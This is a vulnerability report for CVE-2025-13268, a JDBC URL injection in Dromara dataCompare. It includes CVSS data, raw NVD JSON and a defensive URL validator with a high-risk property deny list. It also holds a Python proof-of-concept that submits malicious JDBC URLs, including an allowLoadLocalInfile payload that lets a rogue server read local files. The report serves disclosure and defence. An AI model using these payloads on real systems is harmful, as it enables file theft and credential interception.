Security Vulnerability Report

CVE-2025-13268 (CVSS v3.1: 6.3 MEDIUM)

Published: 2025-11-17 08:16:24
Last Modified: 2026-04-29 01:00:02
NVD status: Deferred

Description

A flaw has been found in Dromara dataCompare up to and including version 1.0.1. The affected element is the function DbConfig in the file src/main/java/com/vince/xq/project/system/dbconfig/service/DbconfigServiceImpl.java, part of the JDBC URL Handler component. Manipulating the JDBC URL passed to this function leads to injection (CWE-74, CWE-707): because the URL reaches the JDBC driver unchecked, an authenticated remote user who can save a data-source configuration controls both the database server the application connects to and the driver connection properties it connects with. The attack can be launched remotely, and a public exploit is available.

CVSS Details

All metrics below were supplied by the CNA (VulDB) and are recorded by NVD as Secondary; the raw data contains no NVD-assessed (Primary) score.

CVSS v3.1: 6.3 MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Sub-scores: exploitability 2.8, impact 3.4

CVSS v4.0: 2.1 LOW
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P (all remaining metrics not defined; exploit maturity: proof of concept)

CVSS v2.0: 6.5 MEDIUM
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

The attack vector is the same in all three versions (network, low complexity, low privileges, no user interaction). The v4.0 score is much lower because v4.0 rates low C/I/A impact confined to the vulnerable system, with no subsequent-system impact, as LOW.

Configurations (Affected Products)

NVD has published no CPE configuration for this CVE (status: Deferred). The affected range below is taken from the VulDB description:

Dromara dataCompare <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13268 PoC - JDBC URL Injection in Dromara dataCompare
# Target: Dromara dataCompare <= 1.0.1
# Component: DbConfig function in DbconfigServiceImpl.java (JDBC URL Handler)
#
# Note: the endpoint path and JSON field names used below are this PoC's
# assumptions about the DbConfig API. They are not confirmed by the referenced
# GitHub issue and must be checked against the target build before use.
import requests

# Malicious JDBC URL: turns off TLS, lets the (attacker-chosen) server hand the
# client the RSA key used to protect the password, and pins the timezone so the
# driver does not refuse the connection.
malicious_jdbc_url = (
    "jdbc:mysql://target-server:3306/victim_db"
    "?useSSL=false&allowPublicKeyRetrieval=true&serverTimezone=UTC"
)

# Alternative payloads for different attack scenarios:
# 1. Client-side file read: with allowLoadLocalInfile=true a rogue MySQL server
#    controlled by the attacker can request arbitrary files from the dataCompare
#    host through the LOAD DATA LOCAL INFILE protocol.
payload_load_data = "jdbc:mysql://target:3306/db?allowLoadLocalInfile=true"

# 2. Disable transport security controls (same properties as malicious_jdbc_url).
payload_disable_ssl = "jdbc:mysql://target:3306/db?useSSL=false&allowPublicKeyRetrieval=true"

# 3. Labelled by the original PoC as a time-based blind SQL injection probe.
#    waiter_delay() is not a MySQL function and sessionVariables only emits SET
#    statements at connect time, so this string produces no measurable delay.
payload_time_based = "jdbc:mysql://target:3306/db?sessionVariables=waiter_delay(5000)--"


def exploit_cve_2025_13268(target_url, malicious_url):
    """
    Submit a crafted JDBC URL to the DbConfig component.

    An HTTP 200 only shows the configuration was accepted; whether the URL was
    actually used to open a connection has to be confirmed on the attacker's
    listener (for payload 1) or by observing the stored configuration.
    """
    endpoint = f"{target_url}/api/dbconfig/set"   # assumed path, see note above
    # Payload structure for DbConfig injection (assumed field names)
    payload = {
        "configName": "malicious_jdbc",
        "jdbcUrl": malicious_url,
        "username": "attacker",
        "password": "attacker_pwd",
    }
    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Injection payload sent successfully")
            print(f"[+] Payload: {malicious_url}")
            return True
        print(f"[-] Request failed with status: {response.status_code}")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


# Usage example
if __name__ == "__main__":
    target = "http://vulnerable-server:8080"
    exploit_cve_2025_13268(target, malicious_jdbc_url)
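
The PoC works because the DbConfig handler forwards whatever JDBC URL it receives, so the caller chooses both the server and the driver properties. The check below is an added example written for this report, not code from dataCompare or the fix for this issue; it is in Python so it can be run directly against stored configurations, and it mirrors what the Java service should do before a URL reaches DriverManager. The property names are Connector/J's; the contents of the allow-list, the optional host allow-list and the sample URLs are assumptions chosen for illustration.

```python
"""Validate a user-supplied MySQL JDBC URL (added example, not project code)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Connection properties a data-source form may legitimately need. Everything
# not listed is rejected (default deny), so new driver features cannot be
# smuggled in later. Assumed set; adjust to what the application really uses.
ALLOWED_PROPERTIES = {"servertimezone", "characterencoding", "connecttimeout", "sockettimeout"}

# Connector/J properties worth naming in the rejection reason because they are
# the usual targets of JDBC URL injection. Compared case-insensitively.
HIGH_RISK_PROPERTIES = {
    "allowloadlocalinfile": "a rogue server can read files from the application host",
    "allowurlinlocalinfile": "LOAD DATA LOCAL may fetch arbitrary URLs",
    "autodeserialize": "BLOB columns are deserialised (gadget-chain RCE)",
    "queryinterceptors": "loads attacker-chosen classes from the classpath",
    "statementinterceptors": "legacy 5.x name for queryInterceptors",
    "socketfactory": "loads attacker-chosen classes from the classpath",
    "allowmultiqueries": "enables stacked statements in any later SQL injection",
    "usessl": "disables TLS for the database connection",
    "allowpublickeyretrieval": "lets a rogue server obtain password material",
}

_HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")      # plain DNS name or IPv4 only
_DB_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")
_VALUE_RE = re.compile(r"^[A-Za-z0-9_.+:/-]{0,64}$")   # e.g. UTC, Asia/Shanghai, utf8


def check_jdbc_url(url, allowed_hosts=None):
    """Return (ok, reasons). Only the plain jdbc:mysql://host[:port]/db?k=v form
    passes; loadbalance/replication/+srv variants and the address=(...) host
    syntax are refused because they carry hosts and properties the simple
    parser below would not see."""
    reasons = []
    if not url.lower().startswith("jdbc:mysql://"):
        return False, ["only the plain jdbc:mysql://host/db form is accepted"]
    parts = urlsplit(url[len("jdbc:"):])           # 'mysql://...' parses as a URL
    if parts.username is not None or parts.password is not None:
        reasons.append("credentials embedded in the URL")
    host = parts.hostname or ""
    if not _HOST_RE.match(host):
        reasons.append(f"unexpected host spec {host!r}")
    elif allowed_hosts is not None and host not in {h.lower() for h in allowed_hosts}:
        reasons.append(f"host {host!r} is not in the allow-list")
    try:
        parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError:
        reasons.append("port is not a valid integer")
    db = parts.path.lstrip("/")
    if not _DB_RE.match(db):
        reasons.append(f"unexpected database name {db!r}")
    if parts.fragment:
        reasons.append("fragment is not allowed")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        k = key.lower()
        if k in HIGH_RISK_PROPERTIES:
            reasons.append(f"property {key}: {HIGH_RISK_PROPERTIES[k]}")
        elif k not in ALLOWED_PROPERTIES:
            reasons.append(f"property {key} is not in the allow-list")
        elif not _VALUE_RE.match(value):
            reasons.append(f"property {key} has an unexpected value {value!r}")
    return not reasons, reasons


def build_jdbc_url(host, port, database):
    """Preferred design: accept host, port and database as separate fields and
    assemble the URL with a fixed property set, so no raw URL is ever taken
    from the user. Raises ValueError on anything the regexes reject."""
    if not _HOST_RE.match(host) or not _DB_RE.match(database) or not 1 <= port <= 65535:
        raise ValueError("rejected connection parameters")
    return f"jdbc:mysql://{host}:{port}/{database}?serverTimezone=UTC&characterEncoding=utf8"


if __name__ == "__main__":
    # Constructed sample URLs: the PoC payloads from this report plus two benign ones.
    samples = [
        "jdbc:mysql://db.internal:3306/orders?serverTimezone=UTC&characterEncoding=utf8",
        "jdbc:mysql://target:3306/db?allowLoadLocalInfile=true",
        "jdbc:mysql://target-server:3306/victim_db?useSSL=false&allowPublicKeyRetrieval=true&serverTimezone=UTC",
        "jdbc:mysql://address=(host=evil.example)(port=3306)/db",
        build_jdbc_url("db.internal", 3306, "orders"),
    ]
    for s in samples:
        ok, why = check_jdbc_url(s)
        print("OK  " if ok else "DENY", s, *why, sep="\n    " if why else " ")
```

Two design points a reviewer would look for. First, the property check is default-deny with a case-insensitive comparison; naming the high-risk keys is only for the error message, since `sessionVariables` or any property added in a future driver release is refused just the same. Second, the host regex deliberately rejects anything but a bare name or IPv4 address: Connector/J also accepts `address=(host=...)(port=...)` and comma-separated multi-host lists, both of which defeat a naive host check. IPv6 literals are therefore rejected too, which is an accepted limitation here. In the Java service the equivalent fix is `build_jdbc_url`: take host, port and database as separate form fields and never pass a user-supplied URL to `DriverManager.getConnection`.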

References

https://github.com/dromara/dataCompare/issues/13 (issue in the project's tracker)
https://vuldb.com/?ctiid.332603
https://vuldb.com/?id.332603
https://vuldb.com/?submit.689460
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13268",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-17T08:16:24.013",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw has been found in Dromara dataCompare up to 1.0.1. The affected element is the function DbConfig of the file src/main/java/com/vince/xq/project/system/dbconfig/service/DbconfigServiceImpl.java of the component JDBC URL Handler. Executing manipulation can lead to injection. The attack can be launched remotely. The exploit has been published and may be used."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.1,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "baseScore": 6.5,
            "accessVector": "NETWORK",
            "accessComplexity": "LOW",
            "authentication": "SINGLE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL"
          },
          "baseSeverity": "MEDIUM",
          "exploitabilityScore": 8.0,
          "impactScore": 6.4,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-74"},
          {"lang": "en", "value": "CWE-707"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/dromara/dataCompare/issues/13", "source": "[email protected]"},
      {"url": "https://vuldb.com/?ctiid.332603", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.332603", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.689460", "source": "[email protected]"}
    ]
  }
}